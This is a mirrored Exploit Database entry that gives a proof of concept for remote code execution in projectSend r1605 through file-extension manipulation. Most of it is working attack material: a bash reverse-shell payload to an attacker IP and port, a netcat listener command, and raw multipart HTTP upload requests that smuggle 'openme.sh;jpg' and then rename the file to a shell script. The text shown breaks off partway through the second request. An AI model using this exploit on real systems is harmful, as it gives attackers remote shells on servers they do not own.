projectSend r1605 – Remote Code Exectution RCE

Exploit Database
119 阅读

作者： Mirabbas Ağalarov

日期： 2023-04-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51238/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

Exploit Title: projectSend r1605 - Remote Code Exectution RCE

Application: projectSend

Version: r1605

Bugs:rce via file extension manipulation

Technology: PHP

Vendor URL: https://www.projectsend.org/

Software Link: https://www.projectsend.org/

Date of found: 26-01-2023

Author: Mirabbas Ağalarov

Tested on: Linux

POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC

========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files.

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port

nc -lvp 4444

3.and when uploading file it makes http request as below.file name should be like thisopenme.sh;jpg

POST /includes/upload.process.php HTTP/1.1

Host: localhost

Content-Length: 525

sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"

sec-ch-ua-platform: "Linux"

sec-ch-ua-mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI

Accept: */*

Origin: http://localhost

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: http://localhost/upload.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59

Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI

Content-Disposition: form-data; name="name"

openme.sh;jpg

------WebKitFormBoundary0enbZuQQAtahFVjI

Content-Disposition: form-data; name="chunk"

------WebKitFormBoundary0enbZuQQAtahFVjI

Content-Disposition: form-data; name="chunks"

------WebKitFormBoundary0enbZuQQAtahFVjI

Content-Disposition: form-data; name="file"; filename="blob"

Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--

4.In the second request, we do this to the filename section at the bottom.

openme.sh

POST /files-edit.php?ids=34 HTTP/1.1

Host: localhost

Content-Length: 1016

Cache-Control: max-age=0

sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"

sec-ch-ua-mobile: ?0

sec-ch-ua-platform: "Linux"

Upgrade-Insecure-Requests: 1

Origin: http://localhost

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost/files-edit.php?ids=34&type=new

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59

Connection: close